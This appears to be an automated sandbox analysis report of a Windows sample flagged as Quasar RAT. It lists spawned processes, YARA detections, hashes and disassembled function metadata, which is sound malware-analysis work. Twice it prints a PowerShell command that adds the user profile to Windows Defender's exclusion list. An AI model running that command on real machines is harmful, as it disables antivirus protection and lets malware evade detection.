Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:02:09
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:02:09
Start date:	23/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Imagebase:	0xd80000
File size:	144'344 bytes
MD5 hash:	417D6EA61C097F8DF6FEF2A57F9692DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.2184893054.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	23:02:13
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	23:02:15
Start date:	23/04/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	23:02:15
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1980,i,18279504130272871239,1243418513114917448,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	23:02:17
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	23:02:17
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=608 --field-trial-handle=1972,i,16479660562393968934,10937071673119511898,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	23:02:24
Start date:	23/04/2024
Path:	C:\Users\user\KxgGGaiW3E.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\KxgGGaiW3E.exe"
Imagebase:	0x7ff703010000
File size:	6'679'218 bytes
MD5 hash:	EB0BEAFCB365CD20EB00FF9E19B73232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	23:02:24
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	23:02:31
Start date:	23/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7956, Parent PID: 7936

General

Target ID:	17
Start time:	23:02:31
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	23:02:32
Start date:	23/04/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.3307610797.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	23:02:32
Start date:	23/04/2024
Path:	C:\Users\user\KxgGGaiW3E.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\KxgGGaiW3E.exe"
Imagebase:	0x7ff703010000
File size:	6'679'218 bytes
MD5 hash:	EB0BEAFCB365CD20EB00FF9E19B73232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	23:02:32
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	23:02:32
Start date:	23/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Imagebase:
File size:	144'344 bytes
MD5 hash:	417D6EA61C097F8DF6FEF2A57F9692DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	23:02:33
Start date:	23/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	23:02:33
Start date:	23/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\cmd.exe"
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	23:02:33
Start date:	23/04/2024
Path:	C:\Windows\regedit.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\regedit.exe"
Imagebase:	0x7ff725d90000
File size:	370'176 bytes
MD5 hash:	999A30979F6195BF562068639FFC4426
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	23:02:34
Start date:	23/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
Imagebase:	0xe30000
File size:	306'264 bytes
MD5 hash:	2B2AE2C9C5D693D2306EF388583B1A03
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	23:02:40
Start date:	23/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2836, Parent PID: 7132

General

Target ID:	28
Start time:	23:02:40
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	23:02:41
Start date:	23/04/2024
Path:	C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Imagebase:	0xed0000
File size:	166'912 bytes
MD5 hash:	A7790328035BBFCF041A6D815F9C28DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000001D.00000002.2488394877.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	23:02:44
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	23:02:45
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1876,i,14537101740333488740,3287298464352964342,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	23:02:47
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	23:02:47
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,6191957489455060914,12654374120200284850,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	28.2%
Total number of Nodes:	1041
Total number of Limit Nodes:	31

Executed Functions

Function 00007FF7F30D4720 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D472F
GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D476D
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D4799
GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D47AA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D47B9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D4850
GetProcessAffinityMask.KERNEL32 ref: 00007FF7F30D4863

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
String ID:
API String ID: 580471860-0
Opcode ID: df729872f656d9d202974d113ebd94060dc68076942cea10bc0c186e7e9af3f3
Instruction ID: 1fa6b8da74b0650b3f44452c30b08bcbcfac70ddbf8e9cb7ce27203b21757030
Opcode Fuzzy Hash: df729872f656d9d202974d113ebd94060dc68076942cea10bc0c186e7e9af3f3
Instruction Fuzzy Hash: F4513B71E1864A87EB80EF15E440169A7E2FF45780FC84136DA6DAB3D5EF2DE408C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30C5600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF7F30C5653

Part of subcall function 00007FF7F30CD980: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F30CDA7D

Strings

TotalStressLogSize, xrefs: 00007FF7F30C5674
StressLogLevel, xrefs: 00007FF7F30C56AD

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionHandlerVectored_wcsicmp
String ID: StressLogLevel$TotalStressLogSize
API String ID: 2513536313-4058818204
Opcode ID: da0bfe873ee71b68cd1092bd1c2a2b3150a6b4515be0c2f2f074457c694a3fbc
Instruction ID: fe10e0765da7dbfd929867cb85bf3edb518a15a10bfaf70be8bd9dd21215134c
Opcode Fuzzy Hash: da0bfe873ee71b68cd1092bd1c2a2b3150a6b4515be0c2f2f074457c694a3fbc
Instruction Fuzzy Hash: 6531743690864282EB90BF15A0012A9F7A2EF817C4F984136DA6D3F6D6CF7CE445C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30F0B10 Relevance: 2.1, APIs: 1, Instructions: 553COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F30D3EA0: CreateEventW.KERNEL32 ref: 00007FF7F30D3EE1

Part of subcall function 00007FF7F30D48F0: QueryPerformanceCounter.KERNEL32 ref: 00007FF7F30D48F9

DebugBreak.KERNEL32 ref: 00007FF7F30F1453

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: BreakCounterCreateDebugEventPerformanceQuery
String ID:
API String ID: 4239280443-0
Opcode ID: 543e9d0fc8645ba3728e5f5564f744260f73d1bd7301d2d127096e2af65f1ec8
Instruction ID: 3768305fbdd395e497cce4d917b45b228fcac59f7b8a5939f9603cb450c3e0cc
Opcode Fuzzy Hash: 543e9d0fc8645ba3728e5f5564f744260f73d1bd7301d2d127096e2af65f1ec8
Instruction Fuzzy Hash: AC623C72908B4686E780EB24E880275B3A5FF44784F90573DD9AD6B7A1DF7CE094C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30DB050 Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

Creation of WaitForGCEvent failed, xrefs: 00007FF7F30DB674

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
String ID: Creation of WaitForGCEvent failed
API String ID: 133006248-2073067640
Opcode ID: 0d3372b43713bd1179a30637ee222c5b760dcbd5f1c2b6ead1cf5d3761128223
Instruction ID: ca00c4eb777e051eb1e08e8cb4d121ad5a7093bb72a948e660efdc4acfa0f023
Opcode Fuzzy Hash: 0d3372b43713bd1179a30637ee222c5b760dcbd5f1c2b6ead1cf5d3761128223
Instruction Fuzzy Hash: D5025E20E0DA4B86EBD4FB21A491279E6D6AF45780FD4453ADC2E7F7D5DE2CE44082E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30EEA70 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31381dec9fc60a636b0f6df860c63a1fccea32eaf01ef564725e9227e137c548
Instruction ID: 8f83d9e2b9172070c4f0b89a61a3ffb510d4833d97ad0bd8632f3ca2ce4abee3
Opcode Fuzzy Hash: 31381dec9fc60a636b0f6df860c63a1fccea32eaf01ef564725e9227e137c548
Instruction Fuzzy Hash: 3D62A361B0D74E46EBE5EB25D440335E292BF44780F95833AD92E7A3D0DF7CA4C486A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30FD240 Relevance: .7, Instructions: 663COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

